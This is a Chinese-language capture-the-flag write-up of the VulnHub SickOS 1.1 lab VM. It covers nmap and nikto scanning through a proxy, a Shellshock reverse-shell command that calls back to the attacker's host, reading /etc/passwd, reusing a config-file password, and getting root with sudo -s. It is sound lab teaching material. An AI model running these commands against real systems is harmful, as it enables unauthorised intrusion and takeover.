vulnhub - SickOS:1.1 writeup

原創 一支神经病 2020-04-15 14:55

主机来源:www.vulnhub.com

下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z

发现IP

安装成功后,查找此虚拟机的IP,我使用的是netdiscover

地址为10.0.3.143

nmap

nmap -sV -p- 10.0.3.143

漏扫

想了一下突破口肯定不是ssh,就从3128端口入手把,是个代理,那就通过这个代理扫描后面的站点

nikto -h 10.0.3.143 -useproxy http://10.0.3.143:3128

exploit

看到有个shellshock的洞,CVE编号是CVE2014-6271,还可以发现漏洞的路径是/cgi-bin/status

我们打下payload,exp可以这里下载

https://www.exploit-db.com/exploits/34900

python 34900.py payload=reverse rhost=10.0.3.143 lhost=10.0.3.141 lport=555 proxy=10.0.3.143:3128 pages=/cgi-bin/status/

然后就获得了一个不太好使但能用的shell

这期间尝试过直接提权,然后并没有成功,就在想其他方法。

想到这是个站点,就去看看网站目录下都有什么把。

 看到了什么,看到了config.php,来看看文件内容吧

 好东西,接下来看看这台机器的用户都有哪些,

cat /etc/passwd

这些用户名都试一下,看哪个密码是john@123

我猜是sickos,因为机器名字是这个,废话不多说,直接试把

提权

劳动人民的智慧,看下sudo列表

这就是传说中的送分题?

直接sudo -s

over

真over

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

OSCP - SickOS:1.1 writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 用到的知識點: nikto漏掃 cgi漏洞 sudo -s提權 發現IP 安裝成

一支神经病 2020-06-23 02:39:29

OSCP - Broken writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/broken/Broken.7z 用到的知識點: hex解密 sudo -l提權 發現IP 安裝成功後,查找此虛擬機的I

一支神经病 2020-06-23 02:39:29

vulhub - symfonos2 writeup

一支神经病 2020-04-27 21:57:49

vulhub - Broken writeup

一支神经病 2020-04-26 23:36:25

vulnhub - SickOS:1.2 writeup

一支神经病 2020-04-21 04:57:18

vulnhub - FourAndSix2 writeup

一支神经病 2020-04-15 14:55:49

Discuz!X前台任意文件删除漏洞重现

wx5c99daab1f230 2020-02-25 14:18:07

OSCP - SickOS:1.1 writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 用到的知識點: nikto漏掃 cgi漏洞 sudo -s提權 發現IP 安裝成

一支神经病 2020-06-23 02:39:29

vulhub - Kioptrix: Level 1.1 (#2) writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 發現IP 安裝成功後,查找此虛擬機的IP,我使用的

一支神经病 2020-06-23 02:39:29

OSCP - FourAndSix2 writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 發現IP 安裝成功後,查找此虛擬機的IP,我使用的是netdiscov

一支神经病 2020-06-23 02:39:29

OSCP - symfonos2 writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/symfonos/symfonos2.7z 用到的知識點: SMB服務匿名訪問 ProFTPD 1.3.5文件拷貝漏洞 j

一支神经病 2020-06-23 02:39:29

OSCP - Raven writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/raven/Raven.ova 用到的知識點: wpscan漏掃 hydra暴破 john解密 python提權 發現I

一支神经病 2020-06-23 02:39:29

OSCP - SickOS:1.2 writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/sickos/sick0s1.2.zip 用到的知識點: PUT上傳 chkrootkit提權 發現IP 安裝成功後,查

一支神经病 2020-06-23 02:39:29

vulhub - Kioptrix: Level 1 (#1) writeup

主機來源:www.vulnhub.com 下載地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 發現IP 安裝成功後,查找此虛擬機的IP,我使用的是netdis

一支神经病 2020-06-23 02:39:29

Vulhub之“Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

簡介 Drupal 是一款用量龐大的CMS,其7.0~7.31版本中存在一處無需認證的SQL漏洞。通過該漏洞,攻擊者可以執行任意SQL語句,插入、修改管理員信息,甚至執行任意代碼。     漏洞環境 進入對應的路徑:  vulhub-ma

angry_program 2020-06-23 10:51:51